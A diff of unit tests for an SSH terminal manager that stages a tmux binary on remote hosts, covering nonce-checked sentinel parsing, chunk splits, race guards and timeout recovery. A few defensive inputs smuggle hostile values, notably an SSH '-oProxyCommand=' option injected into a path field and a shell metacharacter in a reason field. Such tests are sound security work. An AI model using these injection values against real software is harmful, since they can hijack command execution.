+      const patchWriteIdx = writeMock.mock.calls.findIndex((c) => isTmuxBinPatchWrite(c[0]))
+      expect(patchWriteIdx).toBeGreaterThan(-1)
+      const claudeWriteIdx = writeMock.mock.calls.findIndex((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+      expect(claudeWriteIdx).toBeGreaterThan(-1)
+      expect(patchWriteIdx).toBeLessThan(claudeWriteIdx)
+    } finally {
+      _setTmuxArchiveResolverForTest(null)
+    }
+  })
+
+  // Companion: when tier 1/2 already found tmux (no stage/push ever runs),
+  // there is nothing to patch -- no patch write should appear at all.
+  it('sends NO settings patch when tier 1/2 already found tmux (nothing to patch)', () => {
+    driveToClaudeWrite('s-f3-no-patch-needed', 'setup ok {NONCE} tmux=/usr/bin/tmux\r\n')
+    const patchWrite = writeMock.mock.calls.find((c) => {
+      if (typeof c[0] !== 'string' || !c[0].startsWith('echo \'')) return false
+      const m = c[0].match(/^echo '([A-Za-z0-9+\/=]+)' \| base64 -d \| node/)
+      if (!m) return false
+      const decoded = Buffer.from(m[1], 'base64').toString('utf8')
+      return decoded.includes('CCC_TMUX_BIN=')
+    })
+    expect(patchWrite).toBeUndefined()
+  })
+})
+
+// Direct unit coverage of parseTmuxStageSentinel, mirroring parseTmuxSentinel's
+// own describe block below -- same three-way undefined/fail/ok discrimination
+// and the same chunk-truncation defence.
+const PURE_NONCE = 'purenonce123abc'
+describe('parseTmuxStageSentinel (#242)', () => {
+  it('returns undefined when the sentinel is absent from this chunk', () => {
+    expect(parseTmuxStageSentinel('some unrelated PTY output\r\n', PURE_NONCE)).toBeUndefined()
+  })
+
+  it('returns { ok: true, path } for a valid ok sentinel carrying the right nonce', () => {
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage ${PURE_NONCE} ok path=/home/dev/.claude/bin/tmux\r\n`, PURE_NONCE)).toEqual({
+      ok: true,
+      path: '/home/dev/.claude/bin/tmux',
+    })
+  })
+
+  it('returns { ok: false, reason } for a fail sentinel carrying the right nonce', () => {
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage ${PURE_NONCE} fail=terminfo\r\n`, PURE_NONCE)).toEqual({ ok: false, reason: 'terminfo' })
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage ${PURE_NONCE} fail=digest\r\n`, PURE_NONCE)).toEqual({ ok: false, reason: 'digest' })
+  })
+
+  it('degrades an unsafe ok path to a failure rather than trusting it, even with the right nonce', () => {
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage ${PURE_NONCE} ok path=-oProxyCommand=x\r\n`, PURE_NONCE)).toEqual({
+      ok: false,
+      reason: 'unsafe-path',
+    })
+  })
+
+  // #242 finding F1(a), round-2 correction: a staged path outside
+  // ~/.claude/bin -- absolute, no traversal, passes the pure charset
+  // allowlist -- is no longer degraded to a failure HERE. This parser used
+  // to also apply a path-pin (requiring the path end EXACTLY in
+  // "/.claude/bin/tmux") as a security gate, removed because "ends with the
+  // right suffix" is satisfiable from an attacker-writable directory and is
+  // NOT equivalent to "really is under $HOME" -- see this function's own
+  // doc comment. The path is kept for logging ONLY; the actual fix is that
+  // buildTmuxLaunchCommand (ssh-tmux.ts) never reads it for a staged tier at
+  // all (see the pty-manager-ssh-tmux.test.ts F1 describe block above for
+  // the end-to-end proof that the reported path never reaches the launch
+  // command regardless of what this parser returns).
+  it('accepts a staged ok path outside ~/.claude/bin as PARSE-level ok (informational only -- the launch-command sink is what actually never uses it)', () => {
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage ${PURE_NONCE} ok path=/tmp/.x/tmux\r\n`, PURE_NONCE)).toEqual({
+      ok: true,
+      path: '/tmp/.x/tmux',
+    })
+  })
+
+  // #242 finding F1 (b): a sentinel with NO nonce, or the WRONG one, must
+  // be indistinguishable from "not present in this chunk" -- undefined, not
+  // a rejected-but-seen value.
+  it('returns undefined (not a rejection) for a sentinel missing the nonce entirely', () => {
+    expect(parseTmuxStageSentinel('ccc-tmux-stage ok path=/home/dev/.claude/bin/tmux\r\n', PURE_NONCE)).toBeUndefined()
+  })
+
+  it('returns undefined (not a rejection) for a sentinel carrying the WRONG nonce', () => {
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage wrongnonce ok path=/home/dev/.claude/bin/tmux\r\n`, PURE_NONCE)).toBeUndefined()
+  })
+
+  it('returns undefined for a sentinel truncated by a chunk boundary', () => {
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage ${PURE_NONCE} ok path=/home/dev/.cla`, PURE_NONCE)).toBeUndefined()
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage ${PURE_NONCE} fail=term`, PURE_NONCE)).toBeUndefined()
+  })
+
+  // M2 (adversarial review round 5): the fail=<reason> field is raw remote
+  // output too -- an unbounded/garbage value must degrade rather than flow
+  // verbatim into flow-state IPC and logs.
+  it('degrades an unbounded/garbage fail reason to a bounded, charset-guarded placeholder', () => {
+    const huge = 'a'.repeat(500)
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage ${PURE_NONCE} fail=${huge}\r\n`, PURE_NONCE)).toEqual({
+      ok: false,
+      reason: 'invalid-reason',
+    })
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage ${PURE_NONCE} fail=has;metachar\r\n`, PURE_NONCE)).toEqual({
+      ok: false,
+      reason: 'invalid-reason',
+    })
+  })
+
+  it('passes a real, short, lowercase-word fail reason through unchanged', () => {
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage ${PURE_NONCE} fail=download\r\n`, PURE_NONCE)).toEqual({
+      ok: false,
+      reason: 'download',
+    })
+  })
+
+  // #242 finding I5: the capture itself is now BOUNDED (\S{1,4096}), not
+  // unbounded \S+ -- a multi-kilobyte path must not be accepted at all
+  // (regex miss -> undefined), rather than being accepted and only capped
+  // downstream. A within-cap path of realistic length still passes
+  // normally. Mutation to prove this can fail: revert the capture groups
+  // in parseTmuxStageSentinel's regex from `\S{1,4096}` back to `\S+` --
+  // the first assertion below then fails (an 8000-char path parses as ok).
+  it('rejects an ok path capture beyond the 4096-char cap outright (I5)', () => {
+    const hugePath = '/' + 'a'.repeat(8000)
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage ${PURE_NONCE} ok path=${hugePath}\r\n`, PURE_NONCE)).toBeUndefined()
+    // A within-cap, realistic path still parses normally -- the cap does
+    // not clip or otherwise mangle a real value.
+    const okPath = '/' + 'a'.repeat(4000)
+    expect(parseTmuxStageSentinel(`ccc-tmux-stage ${PURE_NONCE} ok path=${okPath}\r\n`, PURE_NONCE)).toEqual({
+      ok: true,
+      path: okPath,
+    })
+  })
+})
+
+// #242 round-3 adversarial review, MAJOR: the whole point of base64-wrapping
+// buildTmuxStageCommand's output (ssh-tmux-stage.ts) is that the REAL
+// parseTmuxStageSentinel, run against the REAL built command, must never
+// match it -- regardless of how a terminal wraps the echoed line into
+// fixed-width rows (the finding proved 80/100/120/132/160/200-column
+// wrapping of the OLD plaintext builder produced a false match at several
+// widths). This exercises both real functions together, not a re-derivation
+// of either's logic.
+describe('echo immunity: buildTmuxStageCommand vs. the real parseTmuxStageSentinel (#242 round-3 MAJOR)', () => {
+  it('never satisfies parseTmuxStageSentinel when column-wrapped at any of the widths the finding proved exploitable', () => {
+    const wire = buildTmuxStageCommand(PURE_NONCE)
+    for (const width of [80, 100, 120, 132, 160, 200]) {
+      let wrapped = ''
+      for (let i = 0; i < wire.length; i += width) {
+        wrapped += wire.slice(i, i + width) + '\r\n'
+      }
+      expect(parseTmuxStageSentinel(wrapped, PURE_NONCE)).toBeUndefined()
+    }
+  })
+
+  // Mutation to prove the above can fail: feed the OLD (unwrapped, plaintext)
+  // shape instead of the real buildTmuxStageCommand() -- reconstructed here
+  // only as the shape the round-3 finding quoted verbatim, to show the SAME
+  // column-wrapping loop DOES produce a match/false-fail against plaintext,
+  // which is exactly why the real function must never emit that shape.
+  it('[control] the same wrapping DOES defeat a plaintext (un-fixed) sentinel command, proving the loop is a real test', () => {
+    const plaintext = `echo "ccc-tmux-stage ${PURE_NONCE} ok path=$HOME/.claude/bin/tmux"`
+    let anyDefined = false
+    for (const width of [80, 100, 120, 132, 160, 200]) {
+      let wrapped = ''
+      for (let i = 0; i < plaintext.length; i += width) {
+        wrapped += plaintext.slice(i, i + width) + '\r\n'
+      }
+      if (parseTmuxStageSentinel(wrapped, PURE_NONCE) !== undefined) anyDefined = true
+    }
+    expect(anyDefined).toBe(true)
+  })
+})
+
+// #242 round-3 MINOR: proceedAfterSetup's own staging-in-flight guard,
+// exercised via the CONTAINER/postCommand flow -- a path with zero prior
+// coverage in this file (every earlier tier-3 test drives the HOST flow via
+// a bare `setup ok tmux=none` sentinel). writeContainerSetupCmd's only call
+// site is launchClaude()'s `if (inInnerShell)` branch, which is already
+// gated by launchClaude's own top-of-function staging guard -- so this
+// documents that the container path respects the SAME invariant the host
+// path does, even though (see the implementer's report) the specific
+// cross-flow race the review described (container-completion firing while
+// HOST staging is in flight) is not reachable through the public API: the
+// two flows share one `currentFlowState` and `writeContainerSetupCmd` has
+// no entry point other than the already-guarded launchClaude().
+function driveToContainerStageWrite(sessionId: string): void {
+  onDataListeners.length = 0
+  spawnPty(fakeWin, sessionId, { ssh: { ...SSH, postCommand: 'enter-container' } } as never)
+  writeMock.mockClear()
+  feedPtyData('Welcome\r\n')
+  vi.advanceTimersByTime(1500) // idle: connecting -> awaiting-postcommand
+  getSshFlow(sessionId)!.runPostCommand()
+  vi.advanceTimersByTime(300) // writePostCommand's 200ms write delay
+  feedPtyData('user@container:~$ ') // inner shell prompt -> inInnerShell=true
+  getSshFlow(sessionId)!.launchClaude() // inInnerShell -> writeContainerSetupCmd
+  vi.advanceTimersByTime(300) // writeContainerSetupCmd's 300ms write delay
+  feedPtyData(nonceSentinel(sessionId, 'setup ok {NONCE} tmux=none\r\n')) // containerSetupDone=true, tmux cleared
+  vi.advanceTimersByTime(1500) // idle: container branch -> proceedAfterSetup -> writeTmuxStageCmd
+  vi.advanceTimersByTime(300) // writeTmuxStageCmd's own 200ms write delay
+}
+
+describe('spawnPty SSH branch — tmux tier-3 staging via the container/postCommand flow (#242 round-3)', () => {
+  beforeEach(() => {
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  it('stages tmux via the container flow when postCommand is configured and tier 1/2 report tmux=none', () => {
+    driveToContainerStageWrite('s-container-stage')
+    expect(writeMock.mock.calls.some((c) => isStagingWrite(c[0]))).toBe(true)
+    expect(writeMock.mock.calls.some((c) => typeof c[0] === 'string' && c[0].includes('claude '))).toBe(false)
+  })
+
+  it('a second Launch-Claude click while container staging is in flight writes nothing until the stage sentinel resolves', () => {
+    driveToContainerStageWrite('s-container-stage-race')
+    const writesWhileStaging = writeMock.mock.calls.length
+    getSshFlow('s-container-stage-race')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    expect(writeMock.mock.calls.length).toBe(writesWhileStaging)
+    feedPtyData(nonceSentinel('s-container-stage-race', 'ccc-tmux-stage {NONCE} fail=download\r\n'))
+    vi.advanceTimersByTime(300)
+    const claudeWrites = writeMock.mock.calls.filter((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrites).toHaveLength(1)
+  })
+})
+
+// #242 round-3 REWORK finding (MAJOR): the container/postCommand flow
+// re-sends the IDENTICAL setup script with the IDENTICAL nonce and
+// sentinel shape as the host flow (see 'idle after container setup ok ->
+// writing claudeCmd' in pty-manager.ts), so it carries the SAME
+// split-chunk bug I1 fixed on the host branch -- and the earlier test
+// suite proved only the host call site (pty-manager.ts:1914), leaving the
+// container call site (pty-manager.ts:1935) free to regress silently. This
+// mirrors 'sentinel split across PTY chunks (#242 finding I1)' above,
+// driving the container branch via the same scaffolding
+// driveToContainerStageWrite uses (spawn with postCommand -> inner-shell
+// prompt -> launchClaude -> writeContainerSetupCmd), but feeds the
+// setup-ok sentinel split across two chunks instead of whole.
+//
+// Mutation to prove this can fail: revert the container-setup-ok handler
+// in pty-manager.ts (~line 1935) to parse `data` (the current chunk
+// alone) instead of the buffered `combined` text -- chunk 2 alone
+// ("th\r\n") never matches `setup ok <nonce> tmux=...` by itself, so
+// containerSetupDone never latches with a resolved tmux class, and the
+// eventual claude write stays bare (no ON_PATH_TMUX_BIN_EXPR wrap) --
+// the assertion below then fails.
+describe('spawnPty SSH branch — container-flow sentinel split across PTY chunks (#242 finding I1, round-3 rework)', () => {
+  beforeEach(() => {
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  it('still wraps in tmux when the container setup-ok sentinel is split across two chunks', () => {
+    const sessionId = 's-i1-container-split'
+    onDataListeners.length = 0
+    spawnPty(fakeWin, sessionId, { ssh: { ...SSH, postCommand: 'enter-container' } } as never)
+    writeMock.mockClear()
+    feedPtyData('Welcome\r\n')
+    vi.advanceTimersByTime(1500) // idle: connecting -> awaiting-postcommand
+    getSshFlow(sessionId)!.runPostCommand()
+    vi.advanceTimersByTime(300) // writePostCommand's 200ms write delay
+    feedPtyData('user@container:~$ ') // inner shell prompt -> inInnerShell=true
+    getSshFlow(sessionId)!.launchClaude() // inInnerShell -> writeContainerSetupCmd
+    vi.advanceTimersByTime(300) // writeContainerSetupCmd's 300ms write delay
+    const nonce = _getSshNonceForTest(sessionId)!
+    // The split lands mid-value, same shape as the host I1 repro -- chunk 1
+    // ends inside the tmux= class token, chunk 2 carries the rest + newline.
+    feedPtyData(`setup ok ${nonce} tmux=pa`)
+    feedPtyData(`th\r\n`)
+    // idle: container branch -> proceedAfterSetup -> writeClaudeCmd
+    // (tmux=path is tier 1, found on PATH -- no tier-3 staging detour).
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300) // writeClaudeCmd's own 200ms write delay
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    expect(claudeWrite![0] as string).toContain(`${ON_PATH_TMUX_BIN_EXPR} new-session -A -s ccc-${sessionId}`)
+  })
+})
+
+// #242 round-3 MAJOR fix: this whole describe block is new. Every tier-4
+// code path in pty-manager.ts (attemptTmuxPush, the arch-probe parse block,
+// the push-sentinel handler, the fail=download+detectedArch trigger gate,
+// the onProgress -> setFlowState forwarding, the abort/recovery path) had
+// ZERO test coverage before this fix -- only the generic hook in
+// pty-chunked-write.test.ts was exercised, never the wiring itself.
+const FAKE_TMUX_ARCHIVE = Buffer.from('A'.repeat(2200))
+
+/**
+ * Drive the manual SSH flow past host setup, tier-3 staging (tmux=none),
+ * the arch-probe reply, and a `fail=download` stage sentinel -- landing on
+ * attemptTmuxPush() having been CALLED (pushSent flips true synchronously)
+ * but its archive-resolver promise NOT YET settled. Deliberately does not
+ * flush microtasks -- callers install a stubbed resolver and/or a custom
+ * writeMock implementation BEFORE the first push chunk write fires by
+ * calling `await flushMicrotasks()` themselves.
+ */
+function driveToPushAttempt(sessionId: string): void {
+  onDataListeners.length = 0
+  spawnPty(fakeWin, sessionId, { ssh: SSH } as never)
+  writeMock.mockClear()
+  getSshFlow(sessionId)!.launchClaude()
+  vi.advanceTimersByTime(300) // past writeHostSetupCmd's 200ms setup write
+  feedPtyData(nonceSentinel(sessionId, 'setup ok {NONCE} tmux=none\r\n'))
+  vi.advanceTimersByTime(1500) // idle fallback -> proceedAfterSetup -> writeTmuxStageCmd scheduled
+  vi.advanceTimersByTime(300) // writeTmuxStageCmd's own 200ms write delay: arch probe + stage write
+  feedPtyData('ccc-tmux-push-arch Linux-x86_64\r\n') // resolves detectedArch before the stage sentinel
+  feedPtyData(nonceSentinel(sessionId, 'ccc-tmux-stage {NONCE} fail=download\r\n')) // triggers attemptTmuxPush (pushSent=true)
+}
+
+describe('spawnPty SSH branch — tmux tier-4 push (#242 round-3)', () => {
+  beforeEach(() => {
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+    _setTmuxArchiveResolverForTest(null)
+    writeMock.mockReset()
+  })
+
+  // Acceptance (d), first half: the item specifies the push trigger is
+  // `stageResult.reason === 'download' && detectedArch` -- BOTH conditions.
+  // Mutation to prove this can fail: drop the `&& detectedArch` half of that
+  // gate in pty-manager.ts -- attemptTmuxPush would then run with a null
+  // arch, and pushActivityDetected() below would flip true.
+  it('does not attempt a push when the arch probe never resolved, even on fail=download', async () => {
+    onDataListeners.length = 0
+    spawnPty(fakeWin, 's-push-noarch', { ssh: SSH } as never)
+    writeMock.mockClear()
+    getSshFlow('s-push-noarch')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    feedPtyData(nonceSentinel('s-push-noarch', 'setup ok {NONCE} tmux=none\r\n'))
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    // No arch-probe reply fed -- detectedArch stays null.
+    feedPtyData(nonceSentinel('s-push-noarch', 'ccc-tmux-stage {NONCE} fail=download\r\n'))
+    vi.advanceTimersByTime(300)
+    expect(pushActivityDetected()).toBe(false)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    expect(claudeWrite![0]).not.toMatch(/new-session\s+-A\s+-s/)
+  })
+
+  // Acceptance (d), second half: a stage failure for any reason OTHER than
+  // 'download' must never trigger a push, even with arch already known.
+  // Mutation to prove this can fail: drop the `stageResult.reason ===
+  // 'download'` half of the gate -- attemptTmuxPush would then also run on
+  // fail=terminfo, and pushActivityDetected() below would flip true.
+  it('does not attempt a push when the stage failure reason is not "download", even with arch known', async () => {
+    onDataListeners.length = 0
+    spawnPty(fakeWin, 's-push-wrongreason', { ssh: SSH } as never)
+    writeMock.mockClear()
+    getSshFlow('s-push-wrongreason')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    feedPtyData(nonceSentinel('s-push-wrongreason', 'setup ok {NONCE} tmux=none\r\n'))
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    feedPtyData('ccc-tmux-push-arch Linux-x86_64\r\n')
+    feedPtyData(nonceSentinel('s-push-wrongreason', 'ccc-tmux-stage {NONCE} fail=terminfo\r\n'))
+    vi.advanceTimersByTime(300)
+    expect(pushActivityDetected()).toBe(false)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    expect(claudeWrite![0]).not.toMatch(/new-session\s+-A\s+-s/)
+  })
+
+  // Acceptance (a): push chunk writes are issued, and no 'claude ' write
+  // occurs while they're still in flight.
+  it('pushes archive bytes down the PTY once arch is known and staging fails with fail=download, writing no claude command until the push resolves', async () => {
+    _setTmuxArchiveResolverForTest(async () => FAKE_TMUX_ARCHIVE)
+    driveToPushAttempt('s-push-happy')
+    await flushMicrotasks() // resolver's .then() runs; first chunk write fires synchronously inside it
+    expect(pushActivityDetected()).toBe(true)
+    expect(writeMock.mock.calls.some((c) => typeof c[0] === 'string' && c[0].includes('claude '))).toBe(false)
+    await vi.advanceTimersByTimeAsync(5000) // drain every remaining chunk write
+    expect(writeMock.mock.calls.some((c) => typeof c[0] === 'string' && c[0].includes('claude '))).toBe(false)
+  })
+
+  // Acceptance (b): getSshFlow(id).getState() reports running-setup with a
+  // 'staging tmux NN%' info string during the transfer -- the onProgress ->
+  // setFlowState forwarding the item specifies.
+  it('reports running-setup with a "staging tmux NN%" info string while the transfer is in flight', async () => {
+    _setTmuxArchiveResolverForTest(async () => FAKE_TMUX_ARCHIVE)
+    driveToPushAttempt('s-push-progress')
+    await flushMicrotasks() // first chunk write + its onProgress call land here
+    const state = getSshFlow('s-push-progress')!.getState()
+    expect(state.state).toBe('running-setup')
+    expect(state.info).toMatch(/^staging tmux \d+%$/)
+  })
+
+  // Acceptance (c), first half: `ccc-tmux-stage ok path=...` after a
+  // completed push produces a tmux-wrapped claude launch.
+  it('wraps the eventual claude launch in tmux when the push sentinel reports ok path=...', async () => {
+    _setTmuxArchiveResolverForTest(async () => FAKE_TMUX_ARCHIVE)
+    driveToPushAttempt('s-push-ok')
+    await flushMicrotasks()
+    await vi.advanceTimersByTimeAsync(5000) // drain the full transfer
+    feedPtyData(nonceSentinel('s-push-ok', 'ccc-tmux-stage {NONCE} ok path=/home/dev/.claude/bin/tmux\r\n'))
+    await vi.advanceTimersByTimeAsync(300) // writeClaudeCmd's own 200ms write delay
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    // #242 finding F1(a), round-2 correction: same fixed-$HOME rule as tier
+    // 3 -- see STAGED_TMUX_BIN_EXPR (ssh-tmux.ts).
+    expect((claudeWrite![0] as string)).toContain('"$HOME"/.claude/bin/tmux new-session -A -s ccc-s-push-ok')
+  })
+
+  // Acceptance (c), second half: `fail=...` after a completed push produces
+  // the bare (unwrapped) claude launch.
+  it('falls through to the unwrapped launch when the push sentinel reports fail=terminfo', async () => {
+    _setTmuxArchiveResolverForTest(async () => FAKE_TMUX_ARCHIVE)
+    driveToPushAttempt('s-push-fail')
+    await flushMicrotasks()
+    await vi.advanceTimersByTimeAsync(5000)
+    feedPtyData(nonceSentinel('s-push-fail', 'ccc-tmux-stage {NONCE} fail=terminfo\r\n'))
+    await vi.advanceTimersByTimeAsync(300)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    expect((claudeWrite![0] as string)).not.toMatch(/new-session\s+-A\s+-s/)
+  })
+
+  // #242 round-3 MAJOR fix. Modeled on the tier-3 "second Launch-Claude
+  // click while staging is in flight" test above -- same hazard, the tier-4
+  // version: a click landing mid-transfer must write nothing containing
+  // 'claude ' until the push's own sentinel/timeout resolves it. Mutation to
+  // prove this can fail: remove the `if (pushSent && !pushDone) return`
+  // guard from proceedAfterSetup/flowController.launchClaude -- the
+  // mid-transfer click then falls through to writeClaudeCmd(), and the
+  // assertion right after the click fails.
+  it('a Launch-Claude click while a tier-4 push is in flight writes nothing containing "claude " until the push sentinel resolves', async () => {
+    _setTmuxArchiveResolverForTest(async () => FAKE_TMUX_ARCHIVE)
+    driveToPushAttempt('s-push-race')
+    await flushMicrotasks()
+    expect(pushActivityDetected()).toBe(true)
+    getSshFlow('s-push-race')!.launchClaude()
+    // 300ms clears writeClaudeCmd's own 200ms write delay -- long enough
+    // that an unguarded click WOULD have landed its write by now, but far
+    // short of the full ~200ms-per-18-chunks transfer still in flight.
+    await vi.advanceTimersByTimeAsync(300)
+    expect(writeMock.mock.calls.some((c) => typeof c[0] === 'string' && c[0].includes('claude '))).toBe(false)
+    await vi.advanceTimersByTimeAsync(5000)
+    feedPtyData(nonceSentinel('s-push-race', 'ccc-tmux-stage {NONCE} ok path=/home/dev/.claude/bin/tmux\r\n'))
+    await vi.advanceTimersByTimeAsync(300)
+    const claudeWrites = writeMock.mock.calls.filter((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrites).toHaveLength(1)
+  })
+
+  // #242 round-3 MINOR fix: an aborted transfer (a write throws mid-push)
+  // must restore echo and drop the partial accumulator file before falling
+  // through to the bare launch -- not leave the remote at `stty -echo`
+  // babysitting a dangling temp file. Mutation to prove this can fail:
+  // revert attemptTmuxPush's onDone to the pre-fix shape (always call
+  // armPushSentinelTimeout(), no completed/bytesLanded check) -- the
+  // recovery-line lookup below then finds nothing (`recovery` stays
+  // undefined) and the `.toBeDefined()` assertion fails.
+  //
+  // #242 finding F2 (adversarial review round 4, MAJOR): the ORIGINAL
+  // version of this test only asserted the recovery string was WRITTEN,
+  // never that it can EXECUTE -- and passed against the pre-fix code, which
+  // wrote the recovery text straight after an aborted chunk line with no
+  // interrupt in between. The chunk lines are `echo '<base64...>' >> "$PATH"`
+  // -- a single quote opened but not yet closed when the write throws
+  // mid-transfer -- so the remote line discipline is left mid-string, and
+  // both the recovery command and the eventual `claude ...` write become
+  // literal content inside that still-open quote rather than executable
+  // shell text.
+  //
+  // Verifying this requires modeling what the remote TTY's line discipline
+  // actually does with a Ctrl-C (see applyLineDiscipline above), applied
+  // ONLY to the bytes that actually reached the remote -- the mock throws
+  // on write #3 (index 2, once the mock is cleared just below so indices
+  // align 1:1 with the local `n` counter), so those bytes never landed and
+  // must be excluded before concatenating. Counting single quotes in the
+  // SURVIVING text after that discard is what tells us whether the remote
+  // is left inside an open string:
+  //   - pre-fix (no `\x03`): the partial `echo '...` line's lone opening
+  //     quote survives untouched -- ODD count.
+  //   - post-fix: `\x03` is sent BEFORE the recovery text, discarding the
+  //     partial line (and its unmatched quote) back to the last completed
+  //     line -- EVEN count.
+  // Mutation to prove this can fail: remove the `ptyProcess.write('\x03')`
+  // call from attemptTmuxPush's onDone abort branch -- `quoteCount % 2`
+  // below then evaluates to 1, and the `.toBe(0)` assertion fails.
+  it('restores echo and removes the partial accumulator file when a push write throws mid-transfer, in a way the remote can actually EXECUTE', async () => {
+    _setTmuxArchiveResolverForTest(async () => FAKE_TMUX_ARCHIVE)
+    driveToPushAttempt('s-push-abort')
+    writeMock.mockClear() // isolate indices to the push phase below
+    let n = 0
+    writeMock.mockImplementation(() => {
+      n++
+      if (n === 3) throw new Error('ERR_STREAM_DESTROYED')
+    })
+    await flushMicrotasks()
+    await vi.advanceTimersByTimeAsync(100)
+
+    const recovery = writeMock.mock.calls.map((c) => c[0]).find((w) => typeof w === 'string' && w.includes('stty echo') && w.includes('rm -f'))
+    expect(recovery).toBeDefined()
+    expect(recovery).toContain('PUSH_ACCUMULATOR_PATH')
+
+    // Only the writes that actually reached the remote -- call #3 (index 2,
+    // 0-indexed) threw, so its bytes never landed.
+    const succeeded = writeMock.mock.calls
+      .filter((_, idx) => idx !== 2)
+      .map((c) => (typeof c[0] === 'string' ? c[0] : ''))
+      .join('')
+    const surviving = applyLineDiscipline(succeeded)
+    const quoteCount = (surviving.match(/'/g) || []).length
+    expect(quoteCount % 2).toBe(0)
+
+    await vi.advanceTimersByTimeAsync(300) // writeClaudeCmd's own 200ms write delay
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    expect((claudeWrite![0] as string)).not.toMatch(/new-session\s+-A\s+-s/)
+  })
+
+  // #242 finding F1 (adversarial review round 4, BLOCKER): the tier-4
+  // host-side DOWNLOAD phase (host-side fetch/cache-lookup of the archive,
+  // before a single chunk is written) had no timeout at all --
+  // armPushSentinelTimeout is reached only from runChunkedWrite's onDone,
+  // which never fires if the resolver itself never settles. A resolver that
+  // hangs forever (a stalled HTTPS response, in production) left the
+  // session permanently wedged with claude never launched -- the opposite of
+  // attemptTmuxPush's own doc comment ("never a NEW way for the flow to get
+  // stuck with claude never launched"). Mutation to prove this can fail:
+  // remove the `downloadTimeoutHandle` arm from attemptTmuxPush (or its
+  // clear in destroy()/`.then()`/`.catch()`, irrelevant here since destroy()
+  // is never called in this test) -- advancing fake timers, even well past
+  // the 45s DOWNLOAD_TIMEOUT_MS used below, then produces zero writes
+  // containing 'claude ' and getState().state never reaches 'running-claude'.
+  it('falls through to the bare claude launch after the download-phase timeout when the archive resolver never settles', async () => {
+    _setTmuxArchiveResolverForTest(() => new Promise(() => { /* never settles -- simulates a stalled HTTPS response */ }))
+    driveToPushAttempt('s-push-download-hang')
+    await flushMicrotasks()
+    // Click #1 while the "download" is hung -- the existing in-flight guard
+    // (pushSent && !pushDone) must swallow it, same as a click mid-transfer.
+    getSshFlow('s-push-download-hang')!.launchClaude()
+    await vi.advanceTimersByTimeAsync(40000) // < DOWNLOAD_TIMEOUT_MS (45000)
+    expect(writeMock.mock.calls.some((c) => typeof c[0] === 'string' && c[0].includes('claude '))).toBe(false)
+    expect(getSshFlow('s-push-download-hang')!.getState().state).not.toBe('running-claude')
+    // Click #2, still hung, still swallowed.
+    getSshFlow('s-push-download-hang')!.launchClaude()
+    await vi.advanceTimersByTimeAsync(10000) // crosses DOWNLOAD_TIMEOUT_MS (+ writeClaudeCmd's own 200ms write delay)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    expect((claudeWrite![0] as string)).not.toMatch(/new-session\s+-A\s+-s/)
+    expect(getSshFlow('s-push-download-hang')!.getState().state).toBe('running-claude')
+  })
+
+  // M3 (adversarial review round 5): attemptTmuxPush's isAlive/stillLive
+  // checks were keyed ONLY on the ptySessions identity, not on the flow's
+  // own `destroyed` flag -- reachable via a DIRECT `getSshFlow(id).destroy()`
+  // call (not through killPty, which deletes the ptySessions entry in the
+  // SAME synchronous frame it destroys the flow -- that's caller
+  // discipline, not an invariant the push loop itself enforced). This test
+  // calls flowController.destroy() directly, leaving the ptySessions entry
+  // untouched, and asserts no further push chunk lands afterward.
+  it('a direct flowController.destroy() (bypassing killPty) stops the in-flight push from writing further chunks', async () => {
+    _setTmuxArchiveResolverForTest(async () => FAKE_TMUX_ARCHIVE)
+    driveToPushAttempt('s-push-direct-destroy')
+    await flushMicrotasks() // first chunk write fires
+    expect(pushActivityDetected()).toBe(true)
+    const writesBeforeDestroy = writeMock.mock.calls.length
+    // Bypasses killPty deliberately -- ptySessions.get('s-push-direct-destroy')
+    // still resolves to the SAME ptyProcess this push is writing to.
+    getSshFlow('s-push-direct-destroy')!.destroy()
+    await vi.advanceTimersByTimeAsync(5000) // would drain the rest of the transfer if unguarded
+    expect(writeMock.mock.calls.length).toBe(writesBeforeDestroy)
+  })
+})
+
+describe('parseTmuxSentinel (#242)', () => {
+  it('returns undefined when the tmux field is absent from this chunk', () => {
+    expect(parseTmuxSentinel('some unrelated PTY output\r\n', PURE_NONCE)).toBeUndefined()
